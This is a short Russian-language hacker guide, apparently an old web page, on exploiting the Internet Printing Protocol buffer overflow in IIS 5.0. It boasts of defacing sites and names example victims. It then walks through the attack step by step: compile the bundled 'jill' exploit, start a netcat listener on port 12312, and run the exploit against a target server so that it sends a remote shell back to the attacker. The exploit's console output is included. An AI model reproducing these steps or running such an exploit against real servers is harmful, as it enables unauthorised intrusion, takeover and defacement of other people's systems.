div.main {margin-left: 20pt; margin-right: 20pt}Дырка IPP: практическое руководство. С 19 апреля в инете было очень весело из-за дырени Internet
Printing Protocol buffer overflow в IIS 5.0. Сия радость дает нам (и
сколько еще даст) удаленный шелл на серваках под NT_IIS 5.0. Только
сегодня уже стало просто лень дефасить сайты.
Для примера : http://mededinteractive.com/ (картинка) http://royalfamily.org/ (картинка) http://lexington.com/ (картинка)
Как юзать? Просто очень.
Заливай exploit (прилагается),
компили. Затем заливай NetCat (прилагается)
запускай под виндой командой:
netcat -l -p 12312 -vv (где 12312 - порт на котором установлен
слухач).
Теперь можно под юнихом запустить скомпиленный exploit:
../jill www.dead-server.com 80 my_nt_machine_with_Netcat
12312
iis5 remote .printer overflow. dark spyrit
<dspyrit@beavuh.org> / beavuh
labs. connecting... sent... you may need to send a carriage
on your listener if the shell doesn't appear. have fun!
Все, после того как exploit кинул на сервак кучу мусора, твой
запущенный NetCat на порту 12312 получает удаленный шелл
сервака.
Теперь можно ваять что угодно.
|